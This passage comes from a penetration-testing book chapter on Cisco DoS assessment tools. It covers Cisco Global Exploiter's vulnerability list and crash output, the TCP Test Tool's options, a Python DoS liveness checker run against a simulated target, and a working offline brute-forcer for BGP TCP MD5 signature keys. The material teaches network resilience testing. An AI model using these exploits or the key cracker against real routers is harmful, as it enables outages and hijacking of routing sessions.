CISCO DOS ASSESSMENT TOOLS

Several tools capable of launching Cisco-centric DoS attacks are freely available for download on the Internet. A vigilant system administrator or a penetration tester can employ them to test her own or the client's network and evaluate its resilience to the DoS attacks that crackers could launch against it. In this section, we review two such tools that are useful for launching a variety of DoS attacks against Cisco boxes.

Cisco Global Exploiter

Attack
Popularity: 7
Simplicity: 8
Impact: 8
Risk Rating: 8

Cisco Global Exploiter (CGE) is a powerful Perl script that can be used to attack Cisco devices and thus assess their patch level. At the time of writing, it includes built-in information about 14 vulnerabilities. The best part about this tool is that it allows easy addition of new security flaws: with only basic Perl knowledge, you can update and customize the tool's vulnerability database to represent the most relevant testing scenario for the network. This framework can be downloaded from http://www.packetstormsecurity.org/ by searching for cge. The default CGE can exploit the following bugs in Cisco devices:

    arhontus $ perl cge.pl
    Usage :
    perl cge.pl <target> <vulnerability number>
    Vulnerabilities list :
    [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
    [2] - Cisco IOS Router Denial of Service Vulnerability
    [3] - Cisco IOS HTTP Auth Vulnerability
    [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
    [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
    [6] - Cisco 675 Web Administration Denial of Service Vulnerability
    [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
    [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
    [9] - Cisco 514 UDP Flood Denial of Service Vulnerability
    [10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
    [11] - Cisco Catalyst Memory Leak Vulnerability
    [12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
    [13] - 0 Encoding IDS Bypass Vulnerability (UTF)
    [14] - Cisco IOS HTTP Denial of Service Vulnerability

With the successful exploitation of a Cisco device, you should see output similar to this:

    arhontus $ perl cge.pl 2611b 2
    Packet sent ...
    Now checking server's status ...
    Vulnerability successful exploited. Target server is down ...

Here 2611b is the name or IP address of the target, and 2 is the vulnerability number; in this particular example it refers to the Cisco IOS Router DoS Vulnerability, in which an invalid HTTP request is sent to the router's web management interface. Note that "successful" here means the target really did go down, so run such a test only on a device you can reach out of band (console or a second management path) and outside production hours.

After upgrading to the latest IOS version, we run the same exploit to check whether the router has been successfully patched for this bug. As you can see, the malformed request no longer crashes the server:

    arhontus $ perl cge.pl 2611b 2
    Packet sent ...
    Now checking server's status ...
    Vulnerability unsuccessful exploited. Target server is still up ...
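The before-and-after procedure above (send the test request, then decide whether the target is still up) is worth doing carefully, because a slow or briefly congested device looks exactly like a crashed one to a single connect attempt. The following script is an added example and is not part of CGE or of the original text; it shows a liveness check with retries and a settle time, a guard against reporting "down" for a target that was unreachable before the test, and a constructed stand-in target (a throwaway local listener that dies on an arbitrary trigger string, which is NOT the real IOS HTTP bug and sends no real exploit payload).

```python
import socket
import threading
import time


def server_is_up(host, port, attempts=3, delay=1.0, timeout=2.0):
    """Liveness probe: a TCP connect, retried so a slow target is not
    misreported as crashed. Any OSError (refused, timeout, unreachable)
    counts as one failed attempt."""
    for _ in range(attempts):
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            time.sleep(delay)
    return False


def send_probe(host, port, payload, timeout=3.0):
    """Deliver the test request. A reset or timeout while sending is itself
    a symptom of the target dying, so it is recorded (None) rather than raised."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(payload)
            try:
                return s.recv(4096)
            except OSError:
                return b""
    except OSError:
        return None


def dos_check(host, port, payload, settle=1.0, **probe_kw):
    """Reproduce the tool's 'Packet sent / Now checking server's status'
    logic with explicit timing. probe_kw (delay, timeout) is forwarded to
    server_is_up(); settle is how long to wait before the post-test probe."""
    if not server_is_up(host, port, attempts=1, **probe_kw):
        return {"before": False, "after": None,
                "verdict": "target unreachable before test; result would be meaningless"}
    send_probe(host, port, payload)
    time.sleep(settle)          # give a dying device time to actually drop its listener
    after = server_is_up(host, port, **probe_kw)
    verdict = "target down (test request crashed it)" if not after else "target still up"
    return {"before": True, "after": after, "verdict": verdict}


class FakeTarget:
    """Constructed stand-in for a device whose HTTP listener dies when a
    request contains `trigger`. Purely a simulation for running this
    example offline; it does not model any real Cisco defect."""

    def __init__(self, trigger):
        self.trigger = trigger
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except OSError:
                return                      # listener already gone
            with conn:
                req = conn.recv(4096)
                if self.trigger in req:
                    self.sock.close()       # simulated reload: listener disappears
                    return
                try:
                    conn.sendall(b"HTTP/1.0 200 OK\r\n\r\n")
                except OSError:
                    pass                    # client (the liveness probe) already hung up


if __name__ == "__main__":
    target = FakeTarget(b"CRASH-TRIGGER")   # constructed trigger, not a real payload
    print(dos_check("127.0.0.1", target.port, b"GET / HTTP/1.0\r\n\r\n", settle=0.2, delay=0.1))
    print(dos_check("127.0.0.1", target.port, b"CRASH-TRIGGER\r\n\r\n", settle=0.2, delay=0.1))
```

Against a real device, the `payload` argument is whatever request the test calls for and `host`/`port` point at its management interface; the retry and settle parameters are the knobs to tune so that a device that merely stalls under load is not written up as crashed.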

Cisco TCP Test Tool

Attack
Popularity: 4
Simplicity: 6
Impact: 7
Risk Rating: 6

The TCP Test Tool was written by Cisco's Critical Infrastructure Assurance Group (CIAG) to perform security assessments on Cisco devices. It allows the user to craft and send customized TCP segments with any payload, and it inherits many of its ideas from the Nemesis packet-construction project. As the help output shows, a large number of options is available for building precise test cases. The TCP Test Tool (ttt) can be obtained from the Cisco Systems web site or from http://www.packetstormsecurity.org.

    arhontus $ ./ttt --help
    TCP Test Tool (ttt) Version 1.3
    Eloy Paris <elparis@cisco.com>
    From ideas by Sean Convery <sean@cisco.com> and the NEMESIS Project
    Usage: ttt [-h] [options]
    General options:
      -h, --help                     display this help and exit
      -c, --count NUM                number of segments to send (default is 1)
      -d, --delay NUM                delay in milliseconds (default is 0)
          --flood NUM                flood the network by sending NUM packets
    TCP options:
      -x, --sport NUM                TCP source port
      -y, --dport NUM                TCP destination port
      -f, --tcpflags                 TCP flags
          -fS SYN, -fA ACK, -fR RST, -fP PSH, -fF FIN, -fU URG
          (can also use --syn, --ack, --rst, --psh, --fin, and --urg)
      -w, --window NUM               window size
      -s, --sequence NUM             sequence number (^ to increment by window)
      -a, --acknowledgement NUM      acknowledgement number
      -u, --urgent NUM               urgent pointer
      -P, --payload FILE             payload file (use stdin if FILE is '-')
      -5, --md5 SECRET               use TCP MD5 signatures (TCP option 19)
          --mss NUM                  TCP maximum segment size
          --wscale NUM               window scale option
          --nocksum                  don't compute TCP checksums
    IP options:
      -S, --src ADDRESS              source IP address
      -D, --dst ADDRESS              destination IP address
      -I, --id NUM                   IP ID
      -T, --ttl NUM                  IP time to live
      -t, --tos NUM                  IP type of service

This utility can also be driven from scripts to generate random payloads or specific option combinations. One example is brute-forcing the TCP MD5 signature secret (TCP option 19) that protects BGP sessions, as tcpsig-crack.pl in the examples directory does. An attacker or penetration tester can generate a large number of testing scenarios with this suite, limited only by the user's imagination.
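The `--md5 SECRET` option and the tcpsig-crack.pl idea both rest on the RFC 2385 signature: MD5 over the TCP pseudo-header, the fixed TCP header with the checksum zeroed (options excluded), the segment data, and finally the shared key. The script below is an added example, not code from ttt, tcpsig-crack.pl or the original text. It builds a signed segment the way a `--md5` send would, then recovers the key from a captured segment by trying a wordlist, which is what a signature brute-force amounts to. All addresses, ports, payload and keys are constructed for the demonstration.

```python
import hashlib
import socket
import struct

TCP_OPT_NOP = 1
TCP_OPT_MD5 = 19            # RFC 2385 TCP MD5 Signature Option
TCP_OPT_MD5_LEN = 18        # kind(1) + len(1) + 16-byte digest
TCP_FIXED_HDR = 20


def _pseudo_header(src_ip, dst_ip, seg_len):
    # src, dst, zero, protocol (TCP), TCP segment length (header+options+data)
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_TCP, seg_len))


def tcp_md5_digest(src_ip, dst_ip, fixed_hdr, opts_len, data, key):
    """RFC 2385: MD5(pseudo-header || fixed TCP header with cksum=0 || data || key).
    Options are NOT covered, which is why the option can carry the digest itself."""
    assert len(fixed_hdr) == TCP_FIXED_HDR and fixed_hdr[16:18] == b"\x00\x00"
    seg_len = TCP_FIXED_HDR + opts_len + len(data)
    return hashlib.md5(_pseudo_header(src_ip, dst_ip, seg_len)
                       + fixed_hdr + data + key).digest()


def _ones_complement_sum(buf):
    if len(buf) % 2:
        buf += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(buf) // 2), buf))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src_ip, dst_ip, segment):
    return (~_ones_complement_sum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment)) & 0xFFFF


def verify_tcp_checksum(src_ip, dst_ip, segment):
    return _ones_complement_sum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0xFFFF


def build_signed_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, window, data, key):
    """Equivalent of what a '--md5 SECRET' send has to do: sign first, then checksum."""
    opts_len = TCP_OPT_MD5_LEN + 2                  # pad with 2 NOPs to a 32-bit boundary
    data_offset = (TCP_FIXED_HDR + opts_len) // 4   # header length in 32-bit words
    fixed = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                        data_offset << 4, flags, window, 0, 0)
    digest = tcp_md5_digest(src_ip, dst_ip, fixed, opts_len, data, key)
    options = bytes([TCP_OPT_MD5, TCP_OPT_MD5_LEN]) + digest + bytes([TCP_OPT_NOP, TCP_OPT_NOP])
    segment = fixed + options + data
    csum = tcp_checksum(src_ip, dst_ip, segment)
    return segment[:16] + struct.pack("!H", csum) + segment[18:]


def extract_md5_option(segment):
    """Walk the TCP options of a raw segment and return the 16-byte digest, or None."""
    data_offset = (segment[12] >> 4) * 4
    opts, i = segment[TCP_FIXED_HDR:data_offset], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                                   # End of Option List
            break
        if kind == TCP_OPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            break                                       # truncated option
        length = opts[i + 1]
        if kind == TCP_OPT_MD5 and length == TCP_OPT_MD5_LEN:
            return opts[i + 2:i + TCP_OPT_MD5_LEN]
        i += max(length, 2)
    return None


def crack_tcp_md5(src_ip, dst_ip, segment, candidates):
    """Offline brute force of the RFC 2385 key from one captured signed segment.
    Returns the first candidate whose signature matches, else None."""
    digest = extract_md5_option(segment)
    if digest is None:
        return None
    data_offset = (segment[12] >> 4) * 4
    fixed = segment[:16] + b"\x00\x00" + segment[18:TCP_FIXED_HDR]  # zero the checksum
    data, opts_len = segment[data_offset:], data_offset - TCP_FIXED_HDR
    for key in candidates:
        if tcp_md5_digest(src_ip, dst_ip, fixed, opts_len, data, key) == digest:
            return key
    return None


if __name__ == "__main__":
    # Constructed BGP-like segment: peer 192.0.2.1 -> 192.0.2.2:179, PSH|ACK, 16-byte BGP marker.
    seg = build_signed_segment("192.0.2.1", "192.0.2.2", 40000, 179, 0x1000, 0x2000,
                               0x18, 16384, b"\xff" * 16, b"bgp-secret")
    print("checksum ok:", verify_tcp_checksum("192.0.2.1", "192.0.2.2", seg))
    print("recovered key:", crack_tcp_md5("192.0.2.1", "192.0.2.2", seg,
                                          [b"cisco", b"password", b"bgp-secret"]))
```

Two points the code makes explicit: the signature must be computed before the checksum (the checksum covers the option, the option's digest is computed with the checksum zeroed), and a single sniffed segment plus the two endpoint addresses is all an offline key guess needs, which is why the strength of a TCP MD5 secret matters far more than its presence.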



Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions
ISBN: 0072259175
Year: 2005